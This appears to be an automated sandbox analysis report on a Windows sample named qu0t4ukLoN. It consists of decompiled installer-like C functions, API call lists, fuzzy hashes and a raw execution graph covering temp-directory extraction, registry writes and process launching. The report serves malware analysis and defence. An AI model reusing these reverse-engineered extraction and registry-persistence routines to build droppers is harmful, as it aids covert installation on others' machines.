                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00a96610
                                                                                                                                                                                                        0x00a96644
                                                                                                                                                                                                        0x00a96647
                                                                                                                                                                                                        0x00a96647
                                                                                                                                                                                                        0x00a96621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A92B33), ref: 00A96602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00A96612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00A96629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00A96635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                        • Instruction ID: 513ee1d8b36cf1e354daf22369da6584cdfe0a062a310d5c4f80e2dc31ca49ff
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF028323041906EEF365B698C88DBBBFDCCF9B364B3A02AFE59582001DA150D0786A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A969B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xa981f8 = E00A96C70();
                                                                                                                                                                                                        				__set_app_type(E00A96FBE(2));
                                                                                                                                                                                                        				 *0xa988a4 =  *0xa988a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xa988a8 =  *0xa988a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xa98528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xa9851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00A97000();
                                                                                                                                                                                                        				if( *0xa98000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00A97000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00A971EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A96FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A96FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00A969C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00A969D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00A969E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00A96A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                        • Instruction ID: dd3c3ba7d22f4b52861300945e2225c069524c56f88487221ced9ddc92d363cd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF0F8703083018FCB54EBB4AE4A6583BA1FB16321B50460BE462862F0CF3E8556CA21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:962
                                                                                                                                                                                                        Total number of Limit Nodes:25
2515->2516 2517 212a6e GlobalFree 2515->2517 2516->2434 2517->2516 2519 212955 GlobalAlloc 2519->2515 2520 212968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 212a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 212a80 GlobalUnlock 2522->2523 2524 212773 2522->2524 2523->2515 2525 2127a3 CharUpperA CharNextA CharNextA 2524->2525 2526 2128b2 2524->2526 2527 2128b7 GetSystemDirectoryA 2525->2527 2528 2127db 2525->2528 2526->2527 2529 2128bf 2527->2529 2530 2127e3 2528->2530 2531 2128a8 GetWindowsDirectoryA 2528->2531 2532 2128d2 2529->2532 2533 21658a CharPrevA 2529->2533 2535 21658a CharPrevA 2530->2535 2531->2529 2534 216ce0 4 API calls 2532->2534 2533->2532 2536 2128e2 2534->2536 2537 212810 RegOpenKeyExA 2535->2537 2536->2522 2537->2529 2538 212837 RegQueryValueExA 2537->2538 2539 21289a RegCloseKey 2538->2539 2540 21285c 2538->2540 2539->2529 2541 212867 ExpandEnvironmentStringsA 2540->2541 2542 21287a 2540->2542 2541->2542 2542->2539 2544 211890 2543->2544 2545 211826 GetProcAddress 2543->2545 2548 216ce0 4 API calls 2544->2548 2546 211889 FreeLibrary 2545->2546 2547 211839 AllocateAndInitializeSid 2545->2547 2546->2544 2547->2546 2551 21185f FreeSid 2547->2551 2549 21189f 2548->2549 2549->2448 2549->2449 2551->2546 2553 21468f 7 API calls 2552->2553 2554 2151f9 LocalAlloc 2553->2554 2555 21522d 2554->2555 2556 21520d 2554->2556 2558 21468f 7 API calls 2555->2558 2557 2144b9 20 API calls 2556->2557 2559 21521e 2557->2559 2560 21523a 2558->2560 2561 216285 GetLastError 2559->2561 2562 215262 lstrcmpA 2560->2562 2563 21523e 2560->2563 2568 212f4d 2561->2568 2565 215272 LocalFree 2562->2565 2566 21527e 2562->2566 2564 2144b9 20 API calls 2563->2564 2567 21524f LocalFree 2564->2567 2565->2568 2569 2144b9 20 API calls 2566->2569 2567->2568 2568->2278 2568->2280 2568->2286 2570 215290 LocalFree 2569->2570 2570->2568 2572 21468f 7 API calls 2571->2572 2573 215175 2572->2573 2574 21517a 2573->2574 2575 2151af 2573->2575 2577 2144b9 20 API calls 
2574->2577 2576 21468f 7 API calls 2575->2576 2578 2151c0 2576->2578 2579 21518d 2577->2579 2733 216298 2578->2733 2579->2287 2582 2151e1 2582->2287 2583 2144b9 20 API calls 2583->2579 2585 21468f 7 API calls 2584->2585 2586 2155c7 LocalAlloc 2585->2586 2587 2155db 2586->2587 2588 2155fd 2586->2588 2589 2144b9 20 API calls 2587->2589 2590 21468f 7 API calls 2588->2590 2592 2155ec 2589->2592 2591 21560a 2590->2591 2593 215632 lstrcmpA 2591->2593 2594 21560e 2591->2594 2595 216285 GetLastError 2592->2595 2597 215645 2593->2597 2598 21564b LocalFree 2593->2598 2596 2144b9 20 API calls 2594->2596 2620 2155f1 2595->2620 2599 21561f LocalFree 2596->2599 2597->2598 2600 215696 2598->2600 2601 21565b 2598->2601 2599->2620 2602 21589f 2600->2602 2604 2156ae GetTempPathA 2600->2604 2609 215467 49 API calls 2601->2609 2605 216517 24 API calls 2602->2605 2603 216ce0 4 API calls 2606 212f7e 2603->2606 2607 2156eb 2604->2607 2608 2156c3 2604->2608 2605->2620 2606->2286 2606->2292 2614 215717 GetDriveTypeA 2607->2614 2615 21586c GetWindowsDirectoryA 2607->2615 2607->2620 2745 215467 2608->2745 2611 215678 2609->2611 2613 2144b9 20 API calls 2611->2613 2611->2620 2613->2620 2616 215730 GetFileAttributesA 2614->2616 2630 21572b 2614->2630 2779 21597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2616->2630 2620->2603 2621 21597d 34 API calls 2621->2630 2622 215467 49 API calls 2622->2607 2623 212630 21 API calls 2623->2630 2625 2157c1 GetWindowsDirectoryA 2625->2630 2626 21658a CharPrevA 2627 2157e8 GetFileAttributesA 2626->2627 2628 2157fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 215827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2616 2630->2620 2630->2621 2630->2623 2630->2625 2630->2626 2630->2629 2631 215467 49 API calls 2630->2631 2775 216952 2630->2775 2631->2630 2633 216249 2632->2633 2634 216268 2632->2634 2635 2144b9 20 API calls 2633->2635 2636 21597d 34 API calls 2634->2636 2637 21625a 2635->2637 2638 21625f 2636->2638 2640 216285 
GetLastError 2637->2640 2639 216ce0 4 API calls 2638->2639 2641 213013 2639->2641 2640->2638 2641->2286 2641->2298 2643 213b2d 2642->2643 2643->2643 2644 213b72 2643->2644 2645 213b53 2643->2645 2845 214fe0 2644->2845 2647 216517 24 API calls 2645->2647 2648 213b70 2647->2648 2649 216298 10 API calls 2648->2649 2650 213b7b 2648->2650 2649->2650 2650->2303 2652 212583 2651->2652 2653 212622 2651->2653 2654 2125e8 RegOpenKeyExA 2652->2654 2655 21258b 2652->2655 2896 2124e0 GetWindowsDirectoryA 2653->2896 2657 2125e3 2654->2657 2658 212609 RegQueryInfoKeyA 2654->2658 2655->2657 2659 21259b RegOpenKeyExA 2655->2659 2657->2308 2660 2125d1 RegCloseKey 2658->2660 2659->2657 2661 2125bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 213bdb 2662->2663 2678 213bec 2662->2678 2665 21468f 7 API calls 2663->2665 2664 213c03 memset 2664->2678 2665->2678 2666 213d13 2668 2144b9 20 API calls 2666->2668 2667 21468f 7 API calls 2667->2678 2674 213d26 2668->2674 2670 216ce0 4 API calls 2671 213f60 2670->2671 2671->2312 2672 213d7b CompareStringA 2673 213fd7 2672->2673 2672->2678 2673->2674 2995 212267 2673->2995 2674->2670 2675 213fab 2679 2144b9 20 API calls 2675->2679 2678->2664 2678->2666 2678->2667 2678->2672 2678->2673 2678->2674 2678->2675 2682 213f46 LocalFree 2678->2682 2683 213f1e LocalFree 2678->2683 2685 213cc7 CompareStringA 2678->2685 2696 213e10 2678->2696 2904 211ae8 2678->2904 2945 21202a memset memset RegCreateKeyExA 2678->2945 2971 213fef 2678->2971 2681 213fbe LocalFree 2679->2681 2681->2674 2682->2674 2683->2673 2683->2678 2685->2678 2686 213f92 2689 2144b9 20 API calls 2686->2689 2687 213e1f GetProcAddress 2688 213f64 2687->2688 2687->2696 2690 2144b9 20 API calls 2688->2690 2691 213fa9 2689->2691 2692 213f75 FreeLibrary 2690->2692 2693 213f7c LocalFree 2691->2693 2692->2693 2694 216285 GetLastError 2693->2694 2695 213f8b 2694->2695 2695->2674 2696->2686 2696->2687 2697 213f40 FreeLibrary 2696->2697 2698 213eff FreeLibrary 2696->2698 2985 216495 
2696->2985 2697->2682 2698->2683 2700 21468f 7 API calls 2699->2700 2701 213a55 LocalAlloc 2700->2701 2702 213a6c 2701->2702 2703 213a8e 2701->2703 2704 2144b9 20 API calls 2702->2704 2705 21468f 7 API calls 2703->2705 2706 213a7d 2704->2706 2707 213a98 2705->2707 2708 216285 GetLastError 2706->2708 2709 213ac5 lstrcmpA 2707->2709 2710 213a9c 2707->2710 2717 212f64 2708->2717 2711 213ada 2709->2711 2712 213b0d LocalFree 2709->2712 2713 2144b9 20 API calls 2710->2713 2714 216517 24 API calls 2711->2714 2712->2717 2715 213aad LocalFree 2713->2715 2716 213aec LocalFree 2714->2716 2715->2717 2716->2717 2717->2278 2717->2286 2719 21628f 2718->2719 2719->2286 2721 21468f 7 API calls 2720->2721 2722 21417d LocalAlloc 2721->2722 2723 214195 2722->2723 2724 2141a8 2722->2724 2725 2144b9 20 API calls 2723->2725 2726 21468f 7 API calls 2724->2726 2727 2141a6 2725->2727 2728 2141b5 2726->2728 2727->2286 2729 2141c5 lstrcmpA 2728->2729 2730 2141b9 2728->2730 2729->2730 2731 2141e6 LocalFree 2729->2731 2732 2144b9 20 API calls 2730->2732 2731->2727 2732->2731 2734 21171e _vsnprintf 2733->2734 2735 2162c9 FindResourceA 2734->2735 2737 216353 2735->2737 2738 2162cb LoadResource LockResource 2735->2738 2739 216ce0 4 API calls 2737->2739 2738->2737 2741 2162e0 2738->2741 2740 2151ca 2739->2740 2740->2582 2740->2583 2742 216355 FreeResource 2741->2742 2743 21631b FreeResource 2741->2743 2742->2737 2744 21171e _vsnprintf 2743->2744 2744->2735 2746 21548a 2745->2746 2747 21551a 2745->2747 2805 2153a1 2746->2805 2816 2158c8 2747->2816 2750 215495 2755 2154c2 GetSystemInfo 2750->2755 2756 21550c 2750->2756 2760 215581 2750->2760 2752 216ce0 4 API calls 2757 21559a 2752->2757 2753 21553b CreateDirectoryA 2758 215577 2753->2758 2759 215547 2753->2759 2754 21554d 2754->2760 2761 21597d 34 API calls 2754->2761 2767 2154da 2755->2767 2762 21658a CharPrevA 2756->2762 2757->2620 2769 212630 GetWindowsDirectoryA 2757->2769 2763 216285 GetLastError 2758->2763 2759->2754 2760->2752 2764 21555c 
2761->2764 2762->2747 2765 21557c 2763->2765 2764->2760 2768 215568 RemoveDirectoryA 2764->2768 2765->2760 2766 21658a CharPrevA 2766->2756 2767->2756 2767->2766 2768->2760 2770 21266f 2769->2770 2771 21265e 2769->2771 2773 216ce0 4 API calls 2770->2773 2772 2144b9 20 API calls 2771->2772 2772->2770 2774 212687 2773->2774 2774->2607 2774->2622 2776 2169a1 2775->2776 2777 21696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 216989 MulDiv 2777->2778 2778->2776 2780 2159bb 2779->2780 2781 2159dd GetDiskFreeSpaceA 2779->2781 2782 2144b9 20 API calls 2780->2782 2783 215ba1 memset 2781->2783 2784 215a21 MulDiv 2781->2784 2785 2159cc 2782->2785 2786 216285 GetLastError 2783->2786 2784->2783 2787 215a50 GetVolumeInformationA 2784->2787 2788 216285 GetLastError 2785->2788 2789 215bbc GetLastError FormatMessageA 2786->2789 2790 215ab5 SetCurrentDirectoryA 2787->2790 2791 215a6e memset 2787->2791 2800 2159d1 2788->2800 2792 215be3 2789->2792 2799 215acc 2790->2799 2793 216285 GetLastError 2791->2793 2794 2144b9 20 API calls 2792->2794 2795 215a89 GetLastError FormatMessageA 2793->2795 2797 215bf5 SetCurrentDirectoryA 2794->2797 2795->2792 2796 216ce0 4 API calls 2798 215c11 2796->2798 2797->2800 2798->2607 2801 215b0a 2799->2801 2803 215b20 2799->2803 2800->2796 2802 2144b9 20 API calls 2801->2802 2802->2800 2803->2800 2828 21268b 2803->2828 2809 2153bf 2805->2809 2806 21171e _vsnprintf 2806->2809 2807 21658a CharPrevA 2808 2153fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2809 2810 21544f CreateDirectoryA 2808->2810 2809->2806 2809->2807 2811 215415 GetTempFileNameA 2809->2811 2810->2811 2812 21543a 2810->2812 2811->2812 2813 215429 DeleteFileA CreateDirectoryA 2811->2813 2814 216ce0 4 API calls 2812->2814 2813->2812 2815 215449 2814->2815 2815->2750 2817 2158d8 2816->2817 2817->2817 2818 2158df LocalAlloc 2817->2818 2819 2158f3 2818->2819 2822 215919 2818->2822 2820 2144b9 20 API calls 2819->2820 2821 215906 2820->2821 2823 216285 GetLastError 2821->2823 
2825 215534 2821->2825 2824 21658a CharPrevA 2822->2824 2823->2825 2826 215931 CreateFileA LocalFree 2824->2826 2825->2753 2825->2754 2826->2821 2827 21595b CloseHandle GetFileAttributesA 2826->2827 2827->2821 2829 2126e5 2828->2829 2830 2126b9 2828->2830 2832 2126ea 2829->2832 2833 21271f 2829->2833 2831 21171e _vsnprintf 2830->2831 2834 2126cc 2831->2834 2835 21171e _vsnprintf 2832->2835 2837 21171e _vsnprintf 2833->2837 2843 2126e3 2833->2843 2839 2144b9 20 API calls 2834->2839 2836 2126fd 2835->2836 2840 2144b9 20 API calls 2836->2840 2841 212735 2837->2841 2838 216ce0 4 API calls 2842 21276d 2838->2842 2839->2843 2840->2843 2844 2144b9 20 API calls 2841->2844 2842->2800 2843->2838 2844->2843 2846 21468f 7 API calls 2845->2846 2847 214ff5 FindResourceA LoadResource LockResource 2846->2847 2848 215020 2847->2848 2861 21515f 2847->2861 2849 215057 2848->2849 2850 215029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 214efd 2849->2864 2850->2849 2853 215060 2854 2144b9 20 API calls 2853->2854 2858 215075 2854->2858 2855 2144b9 20 API calls 2855->2858 2856 215110 FreeResource 2857 21511d 2856->2857 2859 21513a 2857->2859 2862 2144b9 20 API calls 2857->2862 2858->2856 2858->2857 2859->2861 2863 21514c SendMessageA 2859->2863 2860 21507c 2860->2855 2860->2858 2861->2648 2862->2859 2863->2861 2865 214f4a 2864->2865 2866 214fa1 2865->2866 2872 214980 2865->2872 2868 216ce0 4 API calls 2866->2868 2869 214fc6 2868->2869 2869->2853 2869->2860 2873 214990 2872->2873 2874 2149c2 lstrcmpA 2873->2874 2875 2149a5 2873->2875 2877 2149ba 2874->2877 2878 214a0e 2874->2878 2876 2144b9 20 API calls 2875->2876 2876->2877 2877->2866 2880 214b60 2877->2880 2878->2877 2883 21487a 2878->2883 2881 214b92 FindCloseChangeNotification 2880->2881 2882 214b76 2880->2882 2881->2882 2882->2866 2884 2148a2 CreateFileA 2883->2884 2886 2148e9 2884->2886 2887 214908 2884->2887 2886->2887 2888 2148ee 2886->2888 2887->2877 2891 21490c 2888->2891 2892 2148f5 CreateFileA 2891->2892 2894 
214917 2891->2894 2892->2887 2893 214962 CharNextA 2893->2894 2894->2892 2894->2893 2895 214953 CreateDirectoryA 2894->2895 2895->2893 2897 212510 2896->2897 2898 21255b 2896->2898 2899 21658a CharPrevA 2897->2899 2900 216ce0 4 API calls 2898->2900 2901 212522 WritePrivateProfileStringA _lopen 2899->2901 2902 212569 2900->2902 2901->2898 2903 212548 _llseek _lclose 2901->2903 2902->2657 2903->2898 2905 211b25 2904->2905 3009 211a84 2905->3009 2907 211b57 2908 21658a CharPrevA 2907->2908 2910 211b8c 2907->2910 2908->2910 2909 2166c8 2 API calls 2911 211bd1 2909->2911 2910->2909 2912 211d73 2911->2912 2913 211bd9 CompareStringA 2911->2913 2915 2166c8 2 API calls 2912->2915 2913->2912 2914 211bf7 GetFileAttributesA 2913->2914 2916 211d53 2914->2916 2917 211c0d 2914->2917 2918 211d7d 2915->2918 2919 211d64 2916->2919 2917->2916 2924 211a84 2 API calls 2917->2924 2920 211d81 CompareStringA 2918->2920 2921 211df8 LocalAlloc 2918->2921 2922 2144b9 20 API calls 2919->2922 2920->2921 2931 211d9b 2920->2931 2921->2919 2923 211e0b GetFileAttributesA 2921->2923 2925 211d6c 2922->2925 2926 211e1d 2923->2926 2944 211e45 2923->2944 2927 211c31 2924->2927 2930 216ce0 4 API calls 2925->2930 2926->2944 2928 211c50 LocalAlloc 2927->2928 2935 211a84 2 API calls 2927->2935 2928->2919 2929 211c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2929 2937 211cf8 2929->2937 2942 211cc2 2929->2942 2934 211ea1 2930->2934 2931->2931 2936 211dbe LocalAlloc 2931->2936 2934->2678 2935->2928 2936->2919 2938 211de1 2936->2938 2940 211d23 2937->2940 2941 211d09 GetShortPathNameA 2937->2941 2939 21171e _vsnprintf 2938->2939 2939->2942 2943 21171e _vsnprintf 2940->2943 2941->2940 2942->2925 2943->2942 3015 212aac 2944->3015 2950 21209a 2945->2950 2954 212256 2945->2954 2946 216ce0 4 API calls 2947 212263 2946->2947 2947->2678 2948 21171e _vsnprintf 2949 2120af RegQueryValueExA 2948->2949 2949->2950 2951 2120dc 2949->2951 2950->2948 2950->2951 2952 2120e4 RegCloseKey 2951->2952 2953 2120fb 
GetSystemDirectoryA 2951->2953 2952->2954 2955 21658a CharPrevA 2953->2955 2954->2946 2956 21211b LoadLibraryA 2955->2956 2957 212179 GetModuleFileNameA 2956->2957 2958 21212e GetProcAddress FreeLibrary 2956->2958 2959 2121de RegCloseKey 2957->2959 2963 212177 2957->2963 2958->2957 2960 21214e GetSystemDirectoryA 2958->2960 2959->2954 2961 212165 2960->2961 2960->2963 2962 21658a CharPrevA 2961->2962 2962->2963 2963->2963 2964 2121b7 LocalAlloc 2963->2964 2965 2121cd 2964->2965 2966 2121ec 2964->2966 2967 2144b9 20 API calls 2965->2967 2968 21171e _vsnprintf 2966->2968 2967->2959 2969 212218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2954 2972 214016 CreateProcessA 2971->2972 2983 214106 2971->2983 2973 214041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 2140c4 2972->2974 2977 214070 2973->2977 2976 216285 GetLastError 2974->2976 2975 216ce0 4 API calls 2978 214117 2975->2978 2980 2140c9 GetLastError FormatMessageA 2976->2980 3042 21411b 2977->3042 2978->2678 2982 2144b9 20 API calls 2980->2982 2981 214096 CloseHandle CloseHandle 2981->2983 2984 2140ba 2981->2984 2982->2983 2983->2975 2984->2983 2986 2164c2 2985->2986 2987 21658a CharPrevA 2986->2987 2988 2164d8 GetFileAttributesA 2987->2988 2989 216501 LoadLibraryA 2988->2989 2990 2164ea 2988->2990 2992 216508 2989->2992 2990->2989 2991 2164ee LoadLibraryExA 2990->2991 2991->2992 2993 216ce0 4 API calls 2992->2993 2994 216513 2993->2994 2994->2696 2996 212289 RegOpenKeyExA 2995->2996 2998 212381 2995->2998 2996->2998 2999 2122b1 RegQueryValueExA 2996->2999 2997 216ce0 4 API calls 3000 21238c 2997->3000 2998->2997 3001 212374 RegCloseKey 2999->3001 3002 2122e6 memset GetSystemDirectoryA 2999->3002 3000->2674 3001->2998 3003 212321 3002->3003 3004 21230f 3002->3004 3006 21171e _vsnprintf 3003->3006 3005 21658a CharPrevA 3004->3005 3005->3003 3007 21233f RegSetValueExA 3006->3007 3007->3001 3010 211a9a 3009->3010 3012 211aaf 3010->3012 3013 211aba 3010->3013 3028 21667f 3010->3028 3012->3013 3014 
21667f 2 API calls 3012->3014 3013->2907 3014->3012 3016 212ad4 GetModuleFileNameA 3015->3016 3017 212be6 3015->3017 3027 212b02 3016->3027 3018 216ce0 4 API calls 3017->3018 3019 212bf5 3018->3019 3019->2925 3020 212af1 IsDBCSLeadByte 3020->3027 3021 212b11 CharNextA CharUpperA 3023 212b8d CharUpperA 3021->3023 3021->3027 3022 212bca CharNextA 3024 212bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 212b43 CharPrevA 3026->3027 3027->3017 3027->3020 3027->3021 3027->3022 3027->3024 3027->3026 3033 2165e8 3027->3033 3029 216689 3028->3029 3030 216648 IsDBCSLeadByte 3029->3030 3031 2166a5 3029->3031 3032 216697 CharNextA 3029->3032 3030->3029 3031->3010 3032->3029 3034 2165f4 3033->3034 3034->3034 3035 2165fb CharPrevA 3034->3035 3036 216611 CharPrevA 3035->3036 3037 21660b 3036->3037 3038 21661e 3036->3038 3037->3036 3037->3038 3039 21663d 3038->3039 3040 216634 CharNextA 3038->3040 3041 216627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 214132 3042->3043 3045 21412a 3042->3045 3046 211ea7 3043->3046 3045->2981 3047 211ed3 3046->3047 3048 211eba 3046->3048 3047->3045 3049 21256d 15 API calls 3048->3049 3049->3047 3051 211ff0 RegOpenKeyExA 3050->3051 3052 212026 3050->3052 3051->3052 3053 21200f RegDeleteValueA RegCloseKey 3051->3053 3052->2319 3053->3052 3119 216a20 __getmainargs 3120 2119e0 3121 211a24 GetDesktopWindow 3120->3121 3122 211a03 3120->3122 3129 2143d0 6 API calls 3121->3129 3124 211a16 EndDialog 3122->3124 3125 211a20 3122->3125 3124->3125 3127 216ce0 4 API calls 3125->3127 3128 211a7e 3127->3128 3130 214463 SetWindowPos 3129->3130 3132 216ce0 4 API calls 3130->3132 3133 211a33 LoadStringA SetDlgItemTextA MessageBeep 3132->3133 3133->3125 3134 216bef _XcptFilter 3135 217270 _except_handler4_common 3136 2169b0 3137 2169b5 3136->3137 3145 216fbe GetModuleHandleW 3137->3145 3139 2169c1 __set_app_type __p__fmode __p__commode 3140 2169f9 3139->3140 3141 216a02 __setusermatherr 3140->3141 3142 216a0e 3140->3142 3141->3142 3147 
2171ef _controlfp 3142->3147 3144 216a13 3146 216fcf 3145->3146 3146->3139 3147->3144 3148 2134f0 3149 213504 3148->3149 3153 2135b8 3148->3153 3150 21351b 3149->3150 3151 2135be GetDesktopWindow 3149->3151 3149->3153 3154 21354f 3150->3154 3155 21351f 3150->3155 3157 2143d0 11 API calls 3151->3157 3152 213526 3153->3152 3156 213671 EndDialog 3153->3156 3154->3152 3160 213559 ResetEvent 3154->3160 3155->3152 3159 21352d TerminateThread EndDialog 3155->3159 3156->3152 3158 2135d6 3157->3158 3161 2135e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3161 3162 21361d SetWindowTextA CreateThread 3158->3162 3159->3152 3163 2144b9 20 API calls 3160->3163 3161->3162 3162->3152 3164 213646 3162->3164 3165 213581 3163->3165 3166 2144b9 20 API calls 3164->3166 3167 21359b SetEvent 3165->3167 3168 21358a SetEvent 3165->3168 3166->3153 3169 213680 4 API calls 3167->3169 3168->3152 3169->3153 3170 216ef0 3171 216f2d 3170->3171 3172 216f02 3170->3172 3172->3171 3173 216f27 ?terminate@ 3172->3173 3173->3171 3054 216f40 SetUnhandledExceptionFilter 3055 214cc0 GlobalFree 3174 214200 3175 21420b SendMessageA 3174->3175 3176 21421e 3174->3176 3175->3176 3177 213100 3178 213111 3177->3178 3179 2131b0 3177->3179 3182 21311d 3178->3182 3183 213149 GetDesktopWindow 3178->3183 3180 2131b9 SendDlgItemMessageA 3179->3180 3181 213141 3179->3181 3180->3181 3182->3181 3184 213138 EndDialog 3182->3184 3185 2143d0 11 API calls 3183->3185 3184->3181 3186 21315d 6 API calls 3185->3186 3186->3181 3187 214bc0 3189 214c05 3187->3189 3190 214bd7 3187->3190 3188 214c1b SetFilePointer 3188->3190 3189->3188 3189->3190 3191 2130c0 3192 2130de CallWindowProcA 3191->3192 3193 2130ce 3191->3193 3194 2130da 3192->3194 3193->3192 3193->3194 3195 2163c0 3196 216407 3195->3196 3197 21658a CharPrevA 3196->3197 3198 216415 CreateFileA 3197->3198 3199 216448 WriteFile 3198->3199 3200 21643a 3198->3200 3201 216465 CloseHandle 3199->3201 3203 216ce0 4 API calls 3200->3203 3201->3200 3204 21648f 3203->3204 3205 
